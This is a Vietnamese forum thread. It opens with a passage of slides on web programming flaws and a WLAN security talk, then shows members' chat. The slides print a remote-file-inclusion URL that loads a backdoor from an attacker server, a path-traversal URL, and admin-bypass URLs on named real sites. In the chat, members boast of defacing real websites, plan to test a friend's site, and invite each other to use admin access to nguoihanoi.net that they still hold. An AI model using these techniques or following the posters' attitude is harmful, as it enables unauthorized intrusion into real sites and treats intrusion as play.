global $IN, $root_path, $INFO, $DB, $SKIN, $ADMIN, $std, $MEMBER, $GROUP, $ibforums;
require $root_path."sources/lib/post_parser.php";
$parser = new post_parser();

if ($IN['MEMBER_ID'] == "")
{
$ADMIN->error("Could not resolve member id");
}
=====================

Lỗi trong xử lý Files
Hacker có thể tấn công vào như sau: http://victim.com/ibf/sources/Admin/ad_member.php?IN[code]=doform&root_path=http://myserver/


Lỗi trong xử lý Files


Hacker có thể chạy script PHP nằm trong file sources/lib/post_parser.php trên http://myserver (remote server) . Script trong file này có thể là script backdoor, chiếm quyền admin , leo thang chiếm server , deface v..v…





Lỗi trong xử lý Files


• Ngoài ra, Hacker còn có thể tận dụng các lỗi trong việc xử lý file để có thể đọc source hoặc đọc các file hệ thống.


Lỗi trong xử lý Files


Ví dụ : Hacker có thể đọc source của trang web : http://interhacker.org chỉ bằng một cách rất đơn giản là gõ URL: http://interhacker.org/cc/?cclib=../index.php



Lỗi trong xử lý Files


===== index.php =====
<?
include "../functions/basicfc.php";
include "../functions/poster.php";
site_header("Hacking Credit Card");
show_poster("post","ccpost");
show_poster("lib","cclib");
hit_counter("cc.cnt");
site_footer();
?>
=================


Lỗi trong xử lý Files


Lỗi này do người lập trình Web đã xử lý không cẩn thận những tham số của hàm fopen(…),… tạo điều kiện cho hacker có thể xem source v..v…
Lỗi trong xử lý Files
Không những thế hacker còn có thể sử dụng các lỗi này để đọc các file quan trọng của server như /etc/passwd , /etc/domainalias …
Các lỗi về file như thế này đặc biệt nguy hiểm đối với các server bảo mật lỏng lẻo.
Lỗi trong xử lý Files
• Những lỗi trong xử lý file này không những chỉ trên PHP mà còn lỗi trên CGI, ASP , …
• Example: (Chưa hoàn thành xong phần)


Lỗi trong xử lý Files
• Lỗi này là một trong những lỗi cơ bản nhưng nó đã gây ra không ít những khó khăn , thiệt hại cho các chủ Website, server v...v…

Lỗi trong xử lý Files


•Tại Việt Nam , đã có rất nhiều server , website bị hack bởi lỗi này. Điển hình như:

- www.fptnet.com.vn



- www.hcm.fpt.vn



- www.pavietnam.com

v..v…





Lỗi trong xử lý Files


Hiện nay, các lập trình viên đã chú trọng hơn đến lỗi này, vì vậy các trang web của Việt Nam rất ít khi gặp lỗi này . Đây là một tín hiệu mừng cho bảo mật Việt Nam





Một số lỗi cơ bản trong lập trình Web






Một số lỗi lập trình

cơ bản







Files

Khai báo và xử lý biến SQL Injection








Lỗi trong khai báo và xử lý biến


•Lỗi trong khai báo biến và xử lý biến là vô cùng nguy hiểm cho các Website .

•Lỗi này do người viết code không chú ý hay có thể do sai sót trong việc khai báo hoặc xử lý biến mà các hacker có thể lợi dụng để tấn công




Lỗi trong khai báo và xử lý biến


•Rất nhiều Website : Shoping Cart , Mua bán Domain ,…. bị mắc lỗi này trong 1 số khâu quan trọng mà các hacker có thể lợi dụng để gian lận tiền bạc trong giao dịch hay mua bán bất hợp pháp , ……





Lỗi trong khai báo và xử lý biến


Thiệt hại do việc tấn công sẽ không nhỏ và còn làm mất uy tín của người lập trình viên.





Lỗi trong khai báo và xử lý biến


Chúng ta sẽ phân tích một số lỗi để thấy được sự nguy hiểm của lỗi này ( tất cả các lỗi nêu ra đều đã được fix )





Lỗi trong khai báo và xử lý biến


www.truongthi.com.vn:

Bạn có thể access dễ dàng vào Control panel của trang Web trường thi mà trong đó chứa rất nhiều thông tin về account ( 1260, prepaid) , thông tin về Card Trường thi chỉ bằng cách gõ URL:





Lỗi trong khai báo và xử lý biến


www.truongthi.com.vn/Admin/login.asp?uid=1

Sở dĩ có lỗi trên là do trường thi đã không cẩn thận trong check biến uid để Hacker dễ dàng thâm nhập vào Admin Control Panel.





Lỗi trong khai báo và xử lý biến


www.registerfly.com:

Registerfly là một web site lớn để đăng kí domain nhưng vừa rồi lỗi biến push domain. Dựa vào lỗi này Các hacker có thể chuyển toàn bộ n domain của 1 tài khoản này sang tài khoản khác 1 cách bất hợp pháp . Nguyên nhân do cơ chế Push Domain cửa registerfly . Khi push domain từ tài khoản của mình sang tài khoản của người khác trên adress url : push.php?push=0 .





Lỗi trong khai báo và xử lý biến


•Biến push=0 nghĩa là chuyển domain của mình sang người khác , vì registerfly sơ xuất các hacker đã thay đổi giá trị push=1 trên Url ngẫu nhiên chuyển ngược lại domain của người khác sang tài khoản của mình , đây là biến push do registerfly định nghĩa 1 cách chưa cẩn thận , cho phép các tài khoản khác thay đổi giá trị biến mà không được phép .





Lỗi trong khai báo và xử lý biến


•Lỗi Session trong enom và register :

Đây là lỗi tương đối nguy hiểm khi ngườI viết code không chú ý đến biến cần xét hoặc không mã hóa session id cho 1 member dẫn đến có thể access vào user qua secssion id .





Lỗi trong khai báo và xử lý biến


Ví dụ : trong 1 trang thông tin : các thành viên được xác đinh bằng session id , khi 1 người sửa thông tin về mình trên address: http://victim.com/profile.php?id=43 .Người đó sửa id=54 lập tức sang sửa được Information của người khác . Nguyên nhân là do người viết code chỉ chú ý đến thành viên đó có id=43 chứ chưa quan tâm đến các yếu tố khác như username.





Lỗi trong khai báo và xử lý biến


Thậm chí mặc

admin
03-10-2003, 04:03 PM
Mạng không dây và các vấn đề an ninh
10:9', 3/10/ 2003 (GMT+7)


Nguyễn Từ Sơn - HiPT



Tóm tắt nội dung



• Kỹ thuật mạng không dây WLAN

• Những vấn đề an ninh của mạng không dây

• Một số công cụ hacking mạng không dây

• Các biện pháp bảo vệ và phát hiện thâm nhập



Kỹ thuật mạng không dây WLAN



• Mạng không dây WLAN hiện nay dựa trên nền tảng các tiêu chuẩn IEEE 802.11:

– Hoạt động trên các tấn số 2.4 và 5 Ghz thuộc dải tần số giành cho công nghiệp, khoa học và Y tế (ISM).

– Tốc độ từ 1 Mb/s đến 54 Mb/s



Kỹ thuật mạng không dây WLAN



• IEEE 802.11 quy định các tiêu chuẩn về tín hiệu và giao thức nhằm đảm bảo tính tương thích cho các thiết bị mạng không dây.

• Nhờ IEEE 802.11, sự ứng dụng của WLAN đã có bước phát triển nhảy vọt trong 3 năm gần đây.



Một số ưu điểm của mạng không dây WLAN



• Không phải khoan tường, bấm và đi dây.

• Không phải ngồi tại những vị trí cố định.

• Trong nhiều trường hợp là giải pháp rẻ hơn cho mạng LAN

• Có thể kết nối ở khoảng cách xa hơn so với các thiết bị blue tooth hoặc IR.

• Công suất và tốc độ có thể chấp nhận được…..



Nhược điểm của mạng không dây



• Phức tạp hơn trong việc thiết lập, quản lý và vận hành mạng.

• Thông tin được truyền trên không trung trên tần số dùng chung dẫn đến các vấn đề an ninh và nhiễu.

• Tần số càng cao thì tốc độ càng cao, nhưng đồng thời độ suy giảm cũng càng cao...



Các mô hình WLAN



• Mô hình infrastructure: ABCDEF kết nối thông qua AP

• Extended Service Set (ESS)

• A - - - | - ------- Access Point (AP)------- | - - - D

• B - - - | | - - - E

• C - - - | | - - - F

• Mô hình ad-hoc: ABCD kết nối với nhau trực tiếp

• A - - - C

• | \ / |

• | /\ |

• | / \ |

• B - - - D



Những vấn đề an ninh của mạng không dây



• Nhận thức của người dùng:

– Kỹ thuật mới, hiện đại, ít người am hiểu tường tận.

– Quan điểm chủ quan (quá phức tạp chắc không ai biết)

– Cấu hình mặc định của các thiết bị thường ở chế độ mở hoàn toàn.

• Các lỗ hổng bảo mật:

– WEP (wired equivalent protocol) không an toàn

– MAC filtering không hiệu quả vì MAC có thể bị thay đổi



Lỗ hổng bảo mật WEP



• Wired Equivalent Protcol (WEP) là một bộ phận bảo mật của chuẩn IEEE 802.11.

• WEP sử dụng 64 hoặc 128 bits keys để mã hoá data ở mức link-layer dựa trên thuật toán RC4, trong đó 24 bits được dùng cho Initialization Vector (IV).



Lỗ hổng bảo mật WEP



• Do nhược điểm của việc ứng dụng IV và RC4 trong chuẩn 802.11, khoá WEP có thể bị bẻ gãy trong khoảng thời gian tính bằng phút với một may tính thông thường.



MAC spoofing



• Phần lớn các Access Point đều sử dụng danh sách địa chỉ MAC như là một phương tiện bảo mật.

• Người dùng thông thường tưởng rằng mình đã được bảo vệ khi ứng dụng cơ chế hạn chế địa chỉ MAC.

• Tuy nhiên địa chỉ MAC có thể bị thay đổi chỉ với một câu lệnh



Một số công cụ hacking WLAN



• Netstumbler:

– Là công cụ dùng để thu thập thông tin của các AP

– Chạy trên Windows

– Tính năng GPS plug-in cho phép xác định toạ độ của các AP.

– Thu thập tín hiệu một cách chủ động (cách gửi yêu cầu lên không trung và đợi trả lời) nên có thể bị phát hiện.

– Có thể cung cấp các thông tin về AP như MAC, nhà sản xuất, SSID, biện pháp bảo mật, kênh tần số, vv.





Một số công cụ hacking WLAN



• Airsnort:

– Là công cụ được xây dựng nhằm mục đích chứng minh độ an toàn thấp của WEP.

– Chạy trên Linux.

– Bắt tín hiệu trong không gian một cách thụ động nên không bị phát hiện.

– Khi thu thập đủ số liệu, Airsnort có thể tự động bẻ khoá và hiển thị mật khẩu trên màn hình.



Một số công cụ hacking WLAN



• Kismet:

– Cũng là một công cụ dùng để bẻ khoá WEP

– Chạy trên Linux, openBSD, Cygwin, MacOS X

– Nhiều tính năng hơn Airsnort:

• Phát hiện được các IP block

• Log file tương thích với các công cụ khác như Ethereal, Tcpdump hay Airsnort.

• Phát hiện được cả các SSID ẩn

• Phát hiện được nhà sản xuất AP









Các biện pháp bảo mật cho WLAN



• Thay đổi ngay các giá trị mặc định của thiết bị trước khi đưa vào sử dụng.

• Đặt AP ở vị trí hợp lý sao cho người dùng có được tín hiệu tốt nhất và hạn chế được tín hiệu ra bên ngoài.



Các biện pháp bảo mật cho WLAN



• Thay đổi ngay các giá trị mặc định của thiết bị trước khi đưa vào sử dụng.

• Đặt AP ở vị trí hợp lý sao cho người dùng có được tín hiệu tốt nhất và hạn chế được tín hiệu ra bên ngoài.





Các biện pháp bảo mật cho WLAN



• Tránh sử dụng AP trên cùng kênh với các AP khác.

• Áp dụng tất cả các biện pháp bảo mật của thiết bị mà nhà sản xuất cung cấp.

• Luôn cập nhật các phiên bản firmware mới nhất.

• Dùng Virtual Private Network (VPN)





Một số hệ thống phát hiện thâm nhập (IDS)



• IDS có nhiệm vụ phát hiện các thâm nhập và đưa ra các phản ứng kịp thời.

• Đối với các WLAN, WIDS bao gồm 3 phần chính: thu thập tín hiệu, phân tích và phản ứng.



Một số hệ thống phát hiện thâm nhập (IDS)



• WIDZ và Airdefense là một số WIDS có các khả năng như:

– Phát hiện các AP giả

– Phát hiện các tín hiệu yêu cầu lạ

– Gửi thông báo lên màn hình, lògile hoặc qua email cho quản trị mạng khi phát hiện thâm nhập.



Wardriving



• Là hành động dùng các phương tiện như máy tính, card mạng không dây, thiết bị GPS, các phần mềm thích hợp trên một phương tiện giao thông như ô tô, xe bus ... để rà quét tín hiệu nhằm mục đích phát hiện các AP đang hoạt động trên một địa bàn nào đó .







Kết quả của Freiburg Wardriving thực hiện với sự giúp đỡ của Akademie der Polizei Baden-Württemberg:








Lời cám ơn

• Chúng tôi xin chân thành cám ơn:

– Bộ hợp tác và phát triển kinh tế (BMZ) – CHLB Đức

– Học viện cảnh sát bang Baden-Württemberg

đã tài trợ và cung cấp các phương tiện cần thiết cho việc nghiên cứu, tìm hiểu về kỹ thuật mạng không dây và các vấn đề an ninh mà nội dung đã được trình bày trong tài liệu này.

• Xin cám ơn tất cả các quý vị đã theo dõi.

Nothing
03-10-2003, 11:24 PM
By the way, thế cái secu... vẫn để đấy chờ anh em "lớn lên" nhỉ? :P :P
Thằng bạn mình toàn gọi mình là khả năng lập kế hoạch cực tốt . He he

huyenmy
04-10-2003, 01:41 AM
hú hú lại được bác Admin , đã là kỹ thuật,lại còn dài như vậy, có ma naovào đây đâu hú hú. hú hú được cái anh Nothing hú hú , cũng vừa làm bài Việt-Trung rõ là dài Hú hú hú hsu

Nhảm phái có sức mạnh vô biên hú hú

Nothing
02-11-2003, 10:43 PM
Hôm vừa rồi hài cực Yên ạ !!
Bọn tớ học môn An Toàn Trong Các Hệ Thống Thông Tin phải làm bài tập lớn về Web Hacking . Tớ với chú Định Tờ tờ cũng làm . Lên bảng bảo vệ trước thầy giáo và các bạn . Tớ mang đống ảnh mà tớ với cậu Deface chúng nó hồi năm ngoài đấy . Lên chỉ chỏ và mô tả vài trò sơ đẳng hack phpBB 2.0.0, SQL Injection , ...
Thầy giáo và lũ bạn tròn cả mắt . He he, lúc nói xong đi xuống chúng nó vỗ tay ầm ĩ . Buồn cười ko chịu được ... Trong khi báo cáo chưa làm, Slide Power Point thì mới làm có 6 trang sơ sài, vì đêm hôm trước họp nhóm đồ án bận xem phim và nói phét hết đêm, lúc đi về cả lũ cười gần chết .
Thầy giáo còn hỏi tớ là có tham gia nhóm Hacker nào ko mới sợ chứ .
+++++++++++
À lớp tớ có chú Minh Thắng - UFO - Admin Hackervn đấy . May hôm đấy, chú này nghỉ học ko có tớ xấu hổ đến chết mất .

admin
02-11-2003, 10:52 PM
Hihi, à, trong bài báo cáo của bọn babylearntohack có nói về lỗi trong IBF đấy, lỗi này có trong IBF Portal, hôm nào anh em mình vào test dhngoaithuong.com của chú Kid phát nhể :-$ À, ở đây có chú support tham gia nhóm babylearn2hack đấy, nhưng mà chú này kín lắm, không chia sẻ với anh em được. Hơi tiếc. Mà thật sự tớ cũng không thể dành thời gian cho mấy trò này được, còn phải lo học lo đi làm nữa. Cái trò SQL của Microsoft SQL mà mấy chú nào đó làm, lỗi này đã khá phổ biến trên mạng nhưng được cái các chú này viết cụ thể exploits ra , cũng tốt. Hôm nọ trang thethaovietnam.com.vn cũng bị hack bởi lỗi này thì phải, tình cờ tớ có vào và chụp được ảnh.

admin
02-11-2003, 10:53 PM
À, Trà học cùng lớp với chú UFO, lúc nào nhờ chú ấy dạy thêm cho vài đường cơ bản đê, rồi về ... truyền lại cho tớ với :)) . Hi hi. Tinh thần chung là luôn luôn lắng nghe, luôn luôn học hỏi :D

Nothing
02-11-2003, 11:01 PM
Định TT và mấy chú nữa đang giục tớ bảo cậu anh em góp tay xây dựng Securityls đấy . Để học tập và tăng khả năng, tất cả cùng lớn lên . Bạn tớ tuy chưa biết gì nhiều nhưng khả năng của chúng nó thì tớ tin . Cách làm việc và học tập thì rất tốt .
Toàn Tin 6 lên hết .
Có lẽ đến tháng 12 nhé . Lúc đấy thi xong rồi . Chỉ lo học tiếng Anh và làm thực tập thôi .
Đợt vừa rồi, vì chuyện linh tinh tớ hơi đau đầu tý nhưng giờ ổn rồi . Để vào dỡ bỏ lệnh giới nghiêm đi cho bà con thở . Hì hì ....

admin
02-11-2003, 11:15 PM
Được vậy thì tốt quá. Phải có anh em vào giúp sức thì mới làm được. Nói chung khả năng bị tấn công là rất cao, nhưng sau mối lần bị hack như vậy chúng ta mới tiến bộ được, phải không. Theo tớ chúng ta thành lập team mang tên securityls luôn, có phải hay không? Đầu tiên là anh em truyền lại cho nhau ít kinh nghiệm, tuy không nhiều nhưng khá cơ bản. Mới lại tớ nghĩ toàn dân trong nghề, học sẽ rất nhanh. Tớ nghĩ về mặt tiềm năng chúng ta chẳng thua kém gì bọn HVA hay VNH cả, hihi, AQ một tý cho lấy tinh thần nhỉ. Này nhé: Tiếng Anh tốt, vào mạng nhiều, căn bản tin học cũng tốt, lại máu nữa. Thế thì có ngại gì nhỉ?

À, nhớ lại hồi năm ngoái đi hack vn2k không? Thích nhỉ. Chui vào được một site lớn như thế cũng bõ công. :P Cậu còn giữ ảnh không, tớ format ổ cứng mấy lần rồi không biết còn giữ không. À, TTMT vẫn là admin ở nguoihanoi.net :)), bọn nó upgrade mấy lần rồi mà không phát hiện ra. Pass thì vẫn như thường lệ, cậu vào thử chơi xem. Đừng làm gì người ta, trang ấy có nhiều bài hay.

Nothing
02-11-2003, 11:25 PM
Tiếc quá, cái VN2k lại ko có cái ảnh nào cả . Hôm trước mang đi khoe tớ đã tìm kỹ lắm rồi .Chỉ được có khoảng chục cái thôi . Có bọn trường Phan Bội Châu Nghệ An, bọn lqdvt, bọn Kiến Trúc Hà Nội, với mấy Forum của các chatter, à có 1 site tiếng Ý tự tớ search rồi thịt . He he ...
Ừ, thành lập Team đi, tranh thủ luôn cả chú Support đi . Bọn nó ham hố và có nhiều thời gian hơn mình .

Duca
02-11-2003, 11:40 PM
Originally posted by admin@Nov 2 2003, 03:22 PM
Theo tớ chúng ta thành lập team mang tên securityls luôn, có phải hay không? Đầu tiên là anh em truyền lại cho nhau ít kinh nghiệm, tuy không nhiều nhưng khá cơ bản. Mới lại tớ nghĩ toàn dân trong nghề, học sẽ rất nhanh.
Ừ thành lập hội anh thấy hay đấy. Bây giờ muốn làm cái gì hay hay cũng phải có hội, thế mới máu :D . Chẳng nhẽ Lamsơn mà lại không có đủ được một nhóm nhiệt tình à. Các chú có gì bảo anh với, anh chưa biết gì nhưng đợt tới mà rảnh cũng muốn nghịch linh tinh, hihi.

TGCC
09-04-2005, 01:29 PM
Originally posted by Duca@Nov 2 2003, 10:40 PM
Ừ thành lập hội anh thấy hay đấy. Bây giờ muốn làm cái gì hay hay cũng phải có hội, thế mới máu :D . Chẳng nhẽ Lamsơn mà lại không có đủ được một nhóm nhiệt tình à. Các chú có gì bảo anh với, anh chưa biết gì nhưng đợt tới mà rảnh cũng muốn nghịch linh tinh, hihi.
Quoted post



Kế hoạch securityls của các bác bị bỏ quên rồi à? Hay tại anh Duca là người cuối cùng vào nói nên nó chết yểu thế lày nhở :P .

Bây giờ ai cũng đi học đi làm, lại còn bận hơn, nhưng phải nhiệt tình, có độ máu thì mới làm mấy trò này được, em đoán chắc các bác cũng chán rồi. Ngay cả em cũng thấy ngại, nhưng mà học thì biết đâu là bến bờ, đôi khi nhìn và ngẫm nghĩ lại, mọi chuyện đời thường cũng phù phiếm quá, những lúc đấy thấy rảnh rỗi, thấy mình thừa đi một chút, dù đã làm rất nhiều, cả ngày không ngơi nghỉ để tối về tới nhà, thả được cái cặp xuống là lăn ra ngủ, nửa đêm tỉnh dậy ú ớ nhớ ra là còn bài vở, còn một đống việc đang chờ. Hôm nay thứ 7 đẹp trời, vẩn vơ một chút mừng cái sự đẹp trời ấy. Bất chợ thóang rùng mình, ta vẫn đang còn đây sao? Ánh mặt trời ta vẫn còn thấy sao... Hơ hơ, lan man quá.

Thôi, tóm lại kế hoạch này thế nào các bác nhỉ?